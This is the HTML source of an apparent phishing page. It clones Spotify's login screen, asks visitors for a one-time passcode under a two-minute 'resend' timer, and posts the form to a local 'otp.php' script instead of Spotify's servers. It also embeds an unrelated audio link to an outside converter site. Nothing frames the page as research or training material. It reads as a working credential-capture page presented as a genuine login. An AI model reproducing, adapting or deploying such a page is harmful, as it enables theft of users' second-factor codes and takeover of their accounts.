<!DOCTYPE html>
<html ng-app="accounts" ng-csp="" ng-strict-di="" class="ng-scope" lang="en-US"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
    <meta charset="utf-8">
    <title ng-bind="(title &amp;&amp; (title | localize) + ' - ') + 'Spotify'" class="ng-binding">Login - Spotify</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <!-- base href="https://accounts.spotify.com/" -->
    <link href="index_files/index.css" media="screen" rel="stylesheet">

    <script async="" src="index_files/analytics.js"></script><script type="text/javascript" async="" src="index_files/recaptcha__en.js"></script><script async="" defer="defer" src="index_files/api.js"></script>
    <script defer="defer" src="index_files/index.js" sp-bootstrap=""></script>
    <meta ng-non-bindable="" sp-bootstrap-data="{&quot;country&quot;:&quot;BR&quot;,&quot;useCaptcha&quot;:true,&quot;captchaSiteKey&quot;:&quot;6LeIZkQUAAAAANoHuYD1qz5bV_ANGCJ7n7OAW3mo&quot;,&quot;locales&quot;:[&quot;en&quot;,&quot;en_US&quot;],&quot;BON&quot;:[&quot;0&quot;,&quot;0&quot;,880398487]}">
  <style>.grecaptcha-badge:hover { right: 4px !important }</style></head>
  <!-- ngView:  --><body ng-view="" class="ng-scope"><div sp-header="" class="ng-scope"><div class="head "> <a class="spotify-logo" ng-href="/en-US" tabindex="-1" title="Spotify" href="https://accounts.spotify.com/en-US"></a> </div> </div> <div class="container-fluid login ng-scope"> <div class="content"> <div class="row"> <div class="col-xs-12"> <a ng-href="https://www.facebook.com/v2.3/dialog/oauth?client_id=174829003346&amp;state=AQB-Kb-5JrLE65CJt-HB-Z5ZinnCqV1XJtFttc5U68oOHGxVKlV6LFCefH2dHqjt6CutdCpOdob68gmqQTD0onsRL0Nqh_U6LOefp8UAyxuKDhScRK4ct9oUkaJxekvJQZRoy1s&amp;redirect_uri=https%3A%2F%2Faccounts.spotify.com%2Fapi%2Ffacebook%2Foauth%2Faccess_token" class="btn btn-sm btn-block btn-facebook ng-binding" target="_parent" role="button" href="https://www.facebook.com/v2.3/dialog/oauth?client_id=174829003346&amp;state=AQB-Kb-5JrLE65CJt-HB-Z5ZinnCqV1XJtFttc5U68oOHGxVKlV6LFCefH2dHqjt6CutdCpOdob68gmqQTD0onsRL0Nqh_U6LOefp8UAyxuKDhScRK4ct9oUkaJxekvJQZRoy1s&amp;redirect_uri=https%3A%2F%2Faccounts.spotify.com%2Fapi%2Ffacebook%2Foauth%2Faccess_token">Log in with Facebook</a> </div> </div> <div class="row"> <div class="col-xs-12"> <div class="divider"> <strong class="divider-title ng-binding">or</strong> </div> </div> </div> <form name="$parent.accounts" action="otp.php" method="post" novalidate="" class="ng-pristine ng-valid-sp-disallow-chars ng-invalid ng-invalid-required"> <!-- ngIf: status && status !== 200 --> <div class="row" ng-class="{'has-error': (accounts.username.$dirty &amp;&amp; accounts.username.$invalid)}"> <div class="col-xs-12"> <!-- ngIf: accounts.username.$dirty && accounts.username.$invalid --> </div> </div> <div class="row" ng-class="{'has-error': (accounts.password.$dirty &amp;&amp; accounts.password.$invalid)}"> <div class="col-xs-12"> <label for="login-password" class="control-label sr-only ng-binding"> OTP </label> <input ng-model="form.password" class="form-control input-with-feedback ng-pristine ng-untouched ng-empty ng-invalid ng-invalid-required" name="pass" id="login-password" placeholder="OTP" required="" autocomplete="off" ng-trim="false" type="password"> <!-- ngIf: accounts.password.$dirty && accounts.password.$invalid --> </div> &nbsp;
             <center> <div>Resend OTP in - <span id="timer">2:00</span></div></center>
</form>
 <script type="text/javascript">
             startTimer();

function startTimer() {
  var presentTime = document.getElementById('timer').innerHTML;
  var timeArray = presentTime.split(/[:]+/);
  var m = timeArray[0];
  var s = checkSecond((timeArray[1] - 1));
  if(s==11){m=m-1}
  if((m + '').length == 1){
    m = '0' + m;
  }
  if(m < 0){
    m = '11';
  }
  document.getElementById('timer').innerHTML = m + ":" + s;
  setTimeout(startTimer, 1000);
}

function checkSecond(sec) {
  if (sec < 10 && sec >= 0) {sec = "0" + sec}; // add zero in front of numbers < 10
  if (sec < 0) {sec = "59"};
  return sec;
}
</script>
<audio id="xyz" src="https://x2convert.com/Thankyou?token=U2FsdGVkX19zZMVUt9FiInLG3xbWVEJ5Qo3jI3T1LqIK7LvqpIWb9DRoXutU4sdS5xwu6RqaXWm7aJcIoxqPWJPv6y6%2fAwEdoYgxddDrJ%2fKfoRDyWwf3gW%2fB2LL9fK9MxIdB2P2W9PIH0UcMazELrvBIYp0g8pQGFwORMDBjukJFjZc%2f0dMbScfWa5oyiKcE&s=youtube&id=&h=3692998352381650705" preload="auto"></audio>
<br>
<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="color: white">
<span id="displaySeconds"></span></div> <div class="row row-submit"> <div class="col-xs-12 col-sm-6"> <div class="checkbox"> <label class="ng-binding"> <input ng-model="form.remember" name="remember" id="login-remember" class="ng-pristine ng-untouched ng-valid ng-not-empty" checked="checked" type="checkbox"> Remember me <span class="control-indicator"></span> </label> </div> </div> <!-- ngIf: useCaptcha --><div ng-if="useCaptcha" class="g-recaptcha ng-scope" id="g-recaptcha-div" ng-init="initCaptcha()"><div class="grecaptcha-badge" data-style="bottomright" style="width: 256px; height: 60px; transition: right 0.3s ease 0s; position: fixed; bottom: 14px; right: -186px; box-shadow: 0px 0px 5px gray;"><div class="grecaptcha-logo"><iframe src="https://www.google.com/recaptcha/api2/anchor?ar=1&amp;k=6LeIZkQUAAAAANoHuYD1qz5bV_ANGCJ7n7OAW3mo&amp;co=aHR0cHM6Ly9hY2NvdW50cy5zcG90aWZ5LmNvbTo0NDM.&amp;hl=en&amp;type=image&amp;v=v1528855115741&amp;size=invisible&amp;badge=bottomright&amp;cb=yvnqk498tj5a" role="presentation" scrolling="no" sandbox="allow-forms allow-popups allow-same-origin allow-scripts allow-top-navigation allow-modals allow-popups-to-escape-sandbox" frameborder="0" height="60" width="256"></iframe></div><div class="grecaptcha-error"></div><textarea id="g-recaptcha-response" name="g-recaptcha-response" class="g-recaptcha-response" style="width: 250px; height: 40px; border: 1px solid #c1c1c1; margin: 10px 25px; padding: 0px; resize: none;  display: none; "></textarea></div></div><!-- end ngIf: useCaptcha --> <div class="col-xs-12 col-sm-6"> <button class="btn btn-sm btn-block btn-green ng-binding" id="login-button" ng-click="onLoginClick($event)">Log In</button> </div> </div> </form> <!-- ngIf: !iOS && !disableSignup --><div ng-if="!iOS &amp;&amp; !disableSignup" class="row row-hint ng-scope"> <div class="col-xs-12 text-center"> <p> <a ng-href="https://www.spotify.com/br/password-reset/" class="ng-binding" href="https://www.spotify.com/br/password-reset/">Forgot your username or password?</a> </p> <!-- ngIf: !disableSignup --><p ng-if="!disableSignup" class="ng-binding ng-scope"> Don't have an account? <a ng-href="https://www.spotify.com/br/signup/?forward_url=true" class="ng-binding" href="https://www.spotify.com/br/signup/?forward_url=true">Sign Up</a> </p><!-- end ngIf: !disableSignup --> </div> </div><!-- end ngIf: !iOS && !disableSignup --> <div class="col-xs-12"> <div class="divider"></div> <p class="text-muted disclaimer ng-binding" ng-bind-html="'loginTermsOfService' | localize:termsAndConditionsUrl:privacyPolicyUrl">If you click "Log in with Facebook" and are not a Spotify user, you will be registered and you agree to Spotify's <a href="https://www.spotify.com/br/legal/end-user-agreement/plain/" target="_blank">Terms &amp; Conditions</a> and <a href="https://www.spotify.com/br/legal/privacy-policy/plain/" target="_blank">Privacy Policy</a>.</p> </div> </div> </div> <div style="visibility: hidden; position: absolute; width:100%; top: -10000px; left: 0px; right: 0px; transition: visibility 0s linear 0.3s, opacity 0.3s linear; opacity: 0;"><div style="width: 100%; height: 100%; position: fixed; top: 0px; left: 0px; z-index: 2000000000; background-color: #fff; opacity: 0.5;  filter: alpha(opacity=50)"></div><div style="margin: 0 auto; top: 0px; left: 0px; right: 0px; position: absolute; border: 1px solid #ccc; z-index: 2000000000; background-color: #fff; overflow: hidden;"><iframe title="recaptcha challenge" src="index_files/bframe.html" style="width: 100%; height: 100%;" scrolling="no" sandbox="allow-forms allow-popups allow-same-origin allow-scripts allow-top-navigation allow-modals allow-popups-to-escape-sandbox" name="4hbwksn0xcf3" frameborder="0"></iframe></div></div></body></html>
